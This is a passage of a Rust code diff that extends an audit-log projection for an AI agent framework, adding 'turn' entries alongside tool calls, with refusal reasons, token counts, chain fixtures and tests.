definition of // what an entry is. One crate names the type; both ends read it from there. -pub use acton_ai::audit::{AuditDecision, AuditEntry, AuditOutcome}; +pub use acton_ai::audit::{ + AuditDecision, AuditEntry, AuditEntryKind, AuditOutcome, TurnAuditOutcome, +}; pub use acton_ai::policy::Decider; pub use acton_ai::types::TrailId; use serde::{Deserialize, Serialize}; @@ -52,6 +76,11 @@ pub const INGEST_UNAVAILABLE: &str = "audit ingest temporarily unavailable"; /// losing the entry. pub const COMMAND_MAX: usize = 2048; +/// The longest a projected `justification` may be, matching +/// `text(max: 1024)` on the schema. A refusal reason is prose written by a +/// gate, so it is clipped for the same reason a command is. +pub const REASON_MAX: usize = 1024; + /// The suffix a truncated command carries, so a reader can tell. pub const TRUNCATED: &str = "…"; @@ -86,6 +115,12 @@ pub struct ProjectionContext { /// /// Pure: the same entry in the same context always produces the same body, /// which is what lets the ingest hook recompute it and compare. +/// +/// Both entry kinds project into the same row shape. The columns an +/// invocation fills and the columns a turn fills barely overlap, but a single +/// table is what lets an auditor ask "what did this install do between these +/// two timestamps" and get an answer that includes the turns where the model +/// only talked. #[must_use] pub fn project(entry: &AuditEntry, context: &ProjectionContext) -> Value { let mut fields = Map::new(); @@ -102,36 +137,114 @@ pub fn project(entry: &AuditEntry, context: &ProjectionContext) -> Value { ); fields.insert("occurred_at".into(), json!(entry.timestamp)); - fields.insert("kind".into(), json!("tool_call")); - fields.insert("tool_name".into(), json!(entry.tool_name)); - if let Some(command) = command_of(entry) { - fields.insert("command".into(), json!(command)); - } - + fields.insert("kind".into(), json!(kind_column(entry))); fields.insert("decision".into(), json!(decision_of(entry))); - fields.insert("decider".into(), json!(decider_of(entry.decision))); - if let Some(outcome) = outcome_of(&entry.outcome) { + fields.insert("decider".into(), json!(decider_of(entry))); + if let Some(outcome) = outcome_of(entry) { fields.insert("outcome".into(), json!(outcome)); } + if let Some(bytes) = entry.response_size_bytes { + fields.insert("response_bytes".into(), json!(bytes)); + } + + match kind(entry) { + AuditEntryKind::Invocation => project_invocation(entry, context, &mut fields), + AuditEntryKind::Turn => project_turn(entry, &mut fields), + } + + Value::Object(fields) +} + +/// The kind an entry declares, defaulting to the one every legacy entry is. +/// +/// Absence is not ignorance here. acton-ai omits the discriminator on +/// invocation entries on purpose, so that every line written before turns +/// were recorded keeps the exact bytes its hash was computed over. An entry +/// that does not say what it is, is a tool call. +#[must_use] +pub fn kind(entry: &AuditEntry) -> AuditEntryKind { + entry.entry_kind.unwrap_or(AuditEntryKind::Invocation) +} + +/// The `kind` enum value for a sealed entry. Pure. +#[must_use] +pub fn kind_column(entry: &AuditEntry) -> &'static str { + match kind(entry) { + AuditEntryKind::Invocation => "tool_call", + AuditEntryKind::Turn => "turn", + } +} + +/// The columns only a tool call fills. +fn project_invocation( + entry: &AuditEntry, + context: &ProjectionContext, + fields: &mut Map, +) { + let tool = entry.tool_name.as_deref().unwrap_or_default(); + fields.insert("tool_name".into(), json!(tool)); + if let Some(command) = command_of(entry) { + fields.insert("command".into(), json!(command)); + } fields.insert( "sandboxed".into(), - json!(context.sandbox_enabled && is_sandboxed_tool(&entry.tool_name)), + json!(context.sandbox_enabled && is_sandboxed_tool(tool)), ); - fields.insert("elapsed_ms".into(), json!(entry.duration_ms)); + fields.insert("elapsed_ms".into(), json!(entry.duration_ms.unwrap_or(0))); +} - Value::Object(fields) +/// The columns only a turn fills. +/// +/// `sandboxed` is written explicitly rather than left to the schema's +/// `default(true)`: no tool ran, so nothing was confined, and inheriting the +/// default would have every turn row claim a containment it never needed. +fn project_turn(entry: &AuditEntry, fields: &mut Map) { + fields.insert("sandboxed".into(), json!(false)); + if let Some(bytes) = entry.prompt_size_bytes { + fields.insert("prompt_bytes".into(), json!(bytes)); + } + if let Some(provider) = entry.provider.as_ref() { + fields.insert("provider".into(), json!(provider)); + } + if let Some(model) = entry.model.as_ref() { + fields.insert("model".into(), json!(model)); + } + if let Some(tokens) = entry.input_tokens { + fields.insert("input_tokens".into(), json!(tokens)); + } + if let Some(tokens) = entry.output_tokens { + fields.insert("output_tokens".into(), json!(tokens)); + } + if let Some(reason) = refusal_reason(entry) { + fields.insert("justification".into(), json!(truncate(reason, REASON_MAX))); + } +} + +/// Why admission refused a turn, when it did. +/// +/// The rendered reason is the only prose a turn entry carries, and it is the +/// one thing an auditor looking at a run of refusals actually needs: fifty +/// rows saying `forbidden` do not say whether the install lost its seat or an +/// operator paused it. +#[must_use] +pub fn refusal_reason(entry: &AuditEntry) -> Option<&str> { + match entry.turn_outcome.as_ref()? { + TurnAuditOutcome::Refused { reason, .. } => Some(reason.as_str()), + _ => None, + } } /// The command an entry ran, for a shell tool, truncated to the column. /// /// Only `bash` has one: for every other tool the arguments are structured and -/// a flattened rendering would be a worse copy of `entry`. +/// a flattened rendering would be a worse copy of `entry`. A turn entry has +/// no arguments at all and so never has one. #[must_use] pub fn command_of(entry: &AuditEntry) -> Option { - if entry.tool_name != "bash" { + if entry.tool_name.as_deref() != Some("bash") { return None; } - let command = entry.arguments.get("command")?.as_str()?; + let command = entry.arguments.as_ref()?.get("command")?.as_str()?; Some(truncate(command, COMMAND_MAX)) } @@ -158,53 +271,100 @@ pub fn is_sandboxed_tool(tool: &str) -> bool { /// The `decision` enum value for a sealed entry. Pure. /// -/// Four outcomes an auditor cares to tell apart: a human said yes -/// (`approved`), a rule said yes (`auto_approved`), a human declined +/// For a tool call, four outcomes an auditor cares to tell apart: a human said +/// yes (`approved`), a rule said yes (`auto_approved`), a human declined /// (`denied`), and a rule declined (`forbidden`). A prompt nobody answered is /// `timed_out`, which is the one case where "denied" would be a lie about a /// person. +/// +/// For a turn the gate is admission rather than approval, and it is never a +/// person: a turn that ran was let through (`auto_approved`) and a turn that +/// did not was refused (`forbidden`). #[must_use] pub fn decision_of(entry: &AuditEntry) -> &'static str { - let by_human = matches!(entry.decision.decided_by, Decider::Callback); - match (entry.decision.approved, by_human) { + match kind(entry) { + AuditEntryKind::Turn => match entry.turn_outcome.as_ref() { + Some(TurnAuditOutcome::Refused { .. }) | None => "forbidden", + Some(_) => "auto_approved", + }, + AuditEntryKind::Invocation => invocation_decision(entry), + } +} + +/// The `decision` value for a tool call. Pure. +/// +/// An entry carrying no decision at all is malformed rather than permitted. It +/// reads as `forbidden`, because the other direction would let a stripped +/// field launder a refusal into an approval, and the verbatim `entry` column +/// is still there to show what was actually sealed. +fn invocation_decision(entry: &AuditEntry) -> &'static str { + let Some(decision) = entry.decision else { + return "forbidden"; + }; + let by_human = matches!(decision.decided_by, Decider::Callback); + match (decision.approved, by_human) { (true, true) => "approved", (true, false) => "auto_approved", - (false, true) if timed_out(&entry.outcome) => "timed_out", + (false, true) if timed_out(entry) => "timed_out", (false, true) => "denied", (false, false) => "forbidden", } } /// Whether a refusal was a timeout rather than a decision. Pure. -fn timed_out(outcome: &AuditOutcome) -> bool { - matches!(outcome, AuditOutcome::Denied { reason } if reason.starts_with(TIMEOUT_REASON)) +fn timed_out(entry: &AuditEntry) -> bool { + matches!( + entry.outcome.as_ref(), + Some(AuditOutcome::Denied { reason }) if reason.starts_with(TIMEOUT_REASON) + ) } /// The `decider` enum value: which gate reached the verdict. Pure. +/// +/// Admission is a rule and never a person, since nobody is prompted to let a +/// turn start. A refused turn therefore reads as `policy` and an admitted one +/// as `default`, the same value a tool call carries when no policy was in +/// force. #[must_use] -pub fn decider_of(decision: AuditDecision) -> &'static str { - match decision.decided_by { - Decider::NoPolicy => "default", - Decider::Callback => "callback", - _ => "policy", +pub fn decider_of(entry: &AuditEntry) -> &'static str { + match kind(entry) { + AuditEntryKind::Turn => match entry.turn_outcome.as_ref() { + Some(TurnAuditOutcome::Refused { .. }) => "policy", + _ => "default", + }, + AuditEntryKind::Invocation => match entry.decision.map(|decision| decision.decided_by) { + Some(Decider::NoPolicy) | None => "default", + Some(Decider::Callback) => "callback", + Some(_) => "policy", + }, } } -/// The `outcome` enum value, when the call produced one. Pure. +/// The `outcome` enum value, when the entry produced one. Pure. /// -/// A denied call has no outcome: the tool never ran, and recording `error` -/// for it would put a refusal in the same bucket as a failure. +/// A denied call has no outcome: the tool never ran, and recording `error` for +/// it would put a refusal in the same bucket as a failure. A refused turn has +/// none for exactly the same reason, having never reached a provider. #[must_use] -pub fn outcome_of(outcome: &AuditOutcome) -> Option<&'static str> { - match outcome { - AuditOutcome::Success { .. } => Some("success"), - AuditOutcome::Error { .. } => Some("error"), - AuditOutcome::Uncertain { .. } => Some("aborted"), - AuditOutcome::Denied { .. } => None, - // acton-ai marks the enum non-exhaustive. An outcome this build does - // not understand is left unstated rather than guessed at: the - // verbatim entry still carries it. - _ => None, +pub fn outcome_of(entry: &AuditEntry) -> Option<&'static str> { + match kind(entry) { + AuditEntryKind::Turn => match entry.turn_outcome.as_ref()? { + TurnAuditOutcome::Completed => Some("success"), + TurnAuditOutcome::Failed => Some("error"), + TurnAuditOutcome::Interrupted => Some("aborted"), + TurnAuditOutcome::Refused { .. } => None, + // acton-ai marks the enum non-exhaustive. An outcome this build + // does not understand is left unstated rather than guessed at: the + // verbatim entry still carries it. + _ => None, + }, + AuditEntryKind::Invocation => match entry.outcome.as_ref()? { + AuditOutcome::Success { .. } => Some("success"), + AuditOutcome::Error { .. } => Some("error"), + AuditOutcome::Uncertain { .. } => Some("aborted"), + AuditOutcome::Denied { .. } => None, + _ => None, + }, } } @@ -281,41 +441,98 @@ pub fn projection_disagreement( /// process that can seal entries is a process that can forge them. #[cfg(any(test, feature = "testing"))] pub mod fixture { - use acton_ai::audit::{AuditDecision, AuditEntry, AuditOutcome, GENESIS_HASH}; + use acton_ai::audit::{ + AuditDecision, AuditEntry, AuditEntryKind, AuditOutcome, TurnAuditOutcome, GENESIS_HASH, + }; use acton_ai::policy::Decider; use acton_ai::types::{CorrelationId, TrailId, TurnId}; use serde_json::Value; - /// Seals one entry behind `prev_hash` at `sequence`, under `trail_id`. - #[must_use] - pub fn entry( - sequence: u64, - prev_hash: &str, - trail_id: Option<&TrailId>, - tool: &str, - arguments: Value, - outcome: AuditOutcome, - decision: AuditDecision, - ) -> AuditEntry { - let mut built = AuditEntry { + /// The fields every sealed entry carries, whichever kind it is. + /// + /// Split out so the two constructors below cannot drift on the shared + /// half: an invocation and a turn must agree about sequence, timestamp, + /// identity, and predecessor or a chain built from both would not verify. + fn skeleton(sequence: u64, prev_hash: &str, trail_id: Option<&TrailId>) -> AuditEntry { + AuditEntry { sequence, timestamp: format!("2026-08-29T12:00:{:02}Z", sequence % 60), correlation_id: CorrelationId::new(), conversation_id: None, user: None, turn_id: TurnId::new(), - tool_call_id: format!("toolu_{sequence}"), - tool_name: tool.to_string(), - arguments, - outcome, - decision, - duration_ms: 42, - response_size_bytes: Some(11), + entry_kind: None, + tool_call_id: None, + tool_name: None, + arguments: None, + outcome: None, + decision: None, + duration_ms: None, + response_size_bytes: None, + turn_outcome: None, + prompt_size_bytes: None, + provider: None, + model: None, + input_tokens: None, + output_tokens: None, resumed: false, trail_id: trail_id.cloned(), prev_hash: prev_hash.to_string(), hash: String::new(), - }; + } + } + + /// Seals one invocation entry behind `prev_hash` at `sequence`. + /// + /// `entry_kind` is deliberately left absent, which is exactly what + /// acton-ai writes for a tool call: the discriminator exists so a turn + /// can be told apart, not so an invocation has to announce itself. + #[must_use] + pub fn entry( + sequence: u64, + prev_hash: &str, + trail_id: Option<&TrailId>, + tool: &str, + arguments: Value, + outcome: AuditOutcome, + decision: AuditDecision, + ) -> AuditEntry { + let mut built = skeleton(sequence, prev_hash, trail_id); + built.tool_call_id = Some(format!("toolu_{sequence}")); + built.tool_name = Some(tool.to_string()); + built.arguments = Some(arguments); + built.outcome = Some(outcome); + built.decision = Some(decision); + built.duration_ms = Some(42); + built.response_size_bytes = Some(11); + built.hash = built.recompute_hash(); + built + } + + /// Seals one turn entry behind `prev_hash` at `sequence`. + /// + /// Metadata only, exactly as acton-ai seals it: byte counts and token + /// counts, never the prompt or the answer. + #[must_use] + pub fn turn( + sequence: u64, + prev_hash: &str, + trail_id: Option<&TrailId>, + outcome: TurnAuditOutcome, + ) -> AuditEntry { + let refused = matches!(outcome, TurnAuditOutcome::Refused { .. }); + let mut built = skeleton(sequence, prev_hash, trail_id); + built.entry_kind = Some(AuditEntryKind::Turn); + built.turn_outcome = Some(outcome); + built.prompt_size_bytes = Some(64); + built.provider = Some("anthropic".to_string()); + built.model = Some("claude-opus-5".to_string()); + // A refused turn never reached a provider, so it spent nothing and + // produced nothing. Anything else here would be a fixture that could + // not happen. + built.response_size_bytes = Some(if refused { 0 } else { 512 }); + built.input_tokens = Some(if refused { 0 } else { 900 }); + built.output_tokens = Some(if refused { 0 } else { 120 }); built.hash = built.recompute_hash(); built } @@ -342,6 +559,40 @@ pub mod fixture { } entries } + + /// A chain that interleaves turn entries with the tool calls they drove. + /// + /// The shape a real trail has once turns are recorded: a turn entry seals + /// after the calls it made, so a verifier walking the file meets both + /// kinds in one chain. + #[must_use] + pub fn mixed_chain(turns: u64, trail_id: &TrailId) -> Vec { + let mut entries: Vec = Vec::with_capacity((turns * 2) as usize); + let mut prev = GENESIS_HASH.to_string(); + let mut sequence = 0; + for round in 1..=turns { + sequence += 1; + let call = entry( + sequence, + &prev, + Some(trail_id), + "bash", + serde_json::json!({ "command": format!("echo {round}") }), + AuditOutcome::Success { + summary: "ok".to_string(), + }, + AuditDecision::approved(Decider::Callback), + ); + prev.clone_from(&call.hash); + entries.push(call); + + sequence += 1; + let sealed = turn(sequence, &prev, Some(trail_id), TurnAuditOutcome::Completed); + prev.clone_from(&sealed.hash); + entries.push(sealed); + } + entries + } } #[cfg(test)] @@ -522,41 +773,67 @@ mod tests { #[test] fn the_decider_column_separates_no_policy_from_a_human_from_a_rule() { - assert_eq!( - decider_of(AuditDecision::approved(Decider::NoPolicy)), - "default" - ); - assert_eq!( - decider_of(AuditDecision::approved(Decider::Callback)), - "callback" - ); - assert_eq!( - decider_of(AuditDecision::approved(Decider::Allowlist)), - "policy" - ); + let by_default = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::NoPolicy), + )); + let by_human = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::Callback), + )); + let by_rule = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::Allowlist), + )); + + assert_eq!(decider_of(&by_default), "default"); + assert_eq!(decider_of(&by_human), "callback"); + assert_eq!(decider_of(&by_rule), "policy"); } #[test] fn a_refused_call_has_no_outcome_because_the_tool_never_ran() { - assert_eq!( - outcome_of(&AuditOutcome::Denied { - reason: "no".to_string() - }), - None - ); - assert_eq!(outcome_of(&success()), Some("success")); - assert_eq!( - outcome_of(&AuditOutcome::Error { - message: "boom".to_string() - }), - Some("error") - ); - assert_eq!( - outcome_of(&AuditOutcome::Uncertain { - message: "unknown".to_string() - }), - Some("aborted") - ); + let denied = sealed(record( + "bash", + json!({}), + AuditOutcome::Denied { + reason: "no".to_string(), + }, + AuditDecision::refused(Decider::Denylist), + )); + let ran = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::Rules), + )); + let failed = sealed(record( + "bash", + json!({}), + AuditOutcome::Error { + message: "boom".to_string(), + }, + AuditDecision::approved(Decider::Rules), + )); + let unknown = sealed(record( + "bash", + json!({}), + AuditOutcome::Uncertain { + message: "unknown".to_string(), + }, + AuditDecision::refused(Decider::Settlement), + )); + + assert_eq!(outcome_of(&denied), None); + assert_eq!(outcome_of(&ran), Some("success")); + assert_eq!(outcome_of(&failed), Some("error")); + assert_eq!(outcome_of(&unknown), Some("aborted")); } #[test] @@ -592,6 +869,163 @@ mod tests { assert_eq!(project(&entry, &context)["sandboxed"], json!(false)); } + fn sealed_turn(outcome: TurnAuditOutcome) -> AuditEntry { + fixture::turn(1, GENESIS_HASH, Some(&TrailId::new()), outcome) + } + + fn refused(reason: &str) -> TurnAuditOutcome { + TurnAuditOutcome::Refused { + decision: "paused".to_string(), + reason: reason.to_string(), + } + } + + #[test] + fn a_turn_that_called_no_tool_still_projects_a_row() { + // The whole point of the turn entry: a chat turn that produced code + // and never touched a tool used to leave nothing behind at all. + let entry = sealed_turn(TurnAuditOutcome::Completed); + + let fields = project(&entry, &context()); + + assert_eq!(fields["kind"], json!("turn")); + assert_eq!(fields["outcome"], json!("success")); + assert_eq!(fields["chain_seq"], json!(entry.sequence)); + assert_eq!(fields["entry_hash"], json!(entry.hash)); + assert!(fields.get("tool_name").is_none()); + assert!(fields.get("command").is_none()); + } + + #[test] + fn an_entry_that_names_no_kind_is_still_a_tool_call() { + // Every line written before turns were recorded omits the + // discriminator, and must keep reading as what it is. + let entry = sealed(record( + "bash", + json!({ "command": "ls" }), + success(), + AuditDecision::approved(Decider::Callback), + )); + + assert!(entry.entry_kind.is_none()); + assert_eq!(kind(&entry), AuditEntryKind::Invocation); + assert_eq!(project(&entry, &context())["kind"], json!("tool_call")); + } + + #[test] + fn an_admitted_turn_reads_as_a_rule_that_said_yes() { + let entry = sealed_turn(TurnAuditOutcome::Completed); + + let fields = project(&entry, &context()); + + assert_eq!(fields["decision"], json!("auto_approved")); + assert_eq!(fields["decider"], json!("default")); + } + + #[test] + fn a_refused_turn_is_forbidden_and_says_which_gate_refused_it() { + // Fifty rows saying `forbidden` do not tell an auditor whether the + // install lost its seat or an operator paused it. The reason does. + let entry = sealed_turn(refused("no seat entitles this install to run")); + + let fields = project(&entry, &context()); + + assert_eq!(fields["decision"], json!("forbidden")); + assert_eq!(fields["decider"], json!("policy")); + assert_eq!( + fields["justification"], + json!("no seat entitles this install to run") + ); + } + + #[test] + fn a_refused_turn_has_no_outcome_because_it_never_reached_a_provider() { + let entry = sealed_turn(refused("admission is draining")); + + assert_eq!(outcome_of(&entry), None); + assert!(project(&entry, &context()).get("outcome").is_none()); + } + + #[test] + fn a_failed_turn_and_an_interrupted_turn_are_different_facts() { + let failed = sealed_turn(TurnAuditOutcome::Failed); + let interrupted = sealed_turn(TurnAuditOutcome::Interrupted); + + assert_eq!(outcome_of(&failed), Some("error")); + assert_eq!(outcome_of(&interrupted), Some("aborted")); + } + + #[test] + fn a_turn_row_never_claims_the_sandbox_confined_anything() { + // `sandboxed` defaults to true on the schema. A turn ran no tool, so + // leaving the column unset would have every turn overclaim. + let entry = sealed_turn(TurnAuditOutcome::Completed); + + assert_eq!(project(&entry, &context())["sandboxed"], json!(false)); + } + + #[test] + fn a_turn_row_carries_its_counts_and_none_of_its_content() { + let entry = sealed_turn(TurnAuditOutcome::Completed); + + let fields = project(&entry, &context()); + + assert_eq!(fields["prompt_bytes"], json!(64)); + assert_eq!(fields["response_bytes"], json!(512)); + assert_eq!(fields["input_tokens"], json!(900)); + assert_eq!(fields["output_tokens"], json!(120)); + assert_eq!(fields["provider"], json!("anthropic")); + assert_eq!(fields["model"], json!("claude-opus-5")); + + // The verbatim entry is the whole record, so if content were ever + // sealed into a turn it would show up here. + let verbatim = serde_json::to_string(&entry).expect("an entry serializes"); + for content in ["prompt", "response", "content", "text"] { + assert!( + !verbatim.contains(&format!("\"{content}\":\"")), + "a turn entry must carry no {content}: {verbatim}" + ); + } + } + + #[test] + fn a_turn_entry_and_a_tool_call_chain_together() { + // A real trail interleaves them, so a verifier that understood only + // one kind would report a break on every honest file. + let trail = TrailId::new(); + let entries = fixture::mixed_chain(3, &trail); + + assert_eq!(entries.len(), 6); + + let mut head = ChainHead { + sequence: 0, + hash: GENESIS_HASH.to_string(), + entries: 0, + trail_id: None, + }; + for (index, entry) in entries.iter().enumerate() { + head = verify_next(&head, entry, index + 1).expect("a mixed chain must verify"); + } + + assert_eq!(head.sequence, 6); + } + + #[test] + fn an_invocation_whose_decision_was_stripped_does_not_read_as_approved() { + // Absence must fail closed: the permissive reading would let a + // deleted field launder a refusal into an approval. + let mut entry = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::Callback), + )); + entry.decision = None; + + assert_eq!(decision_of(&entry), "forbidden"); + assert_eq!(decider_of(&entry), "default"); + } + fn projection_of(entry: &AuditEntry, install: &str) -> EventProjection { EventProjection { chain_seq: entry.sequence as i64,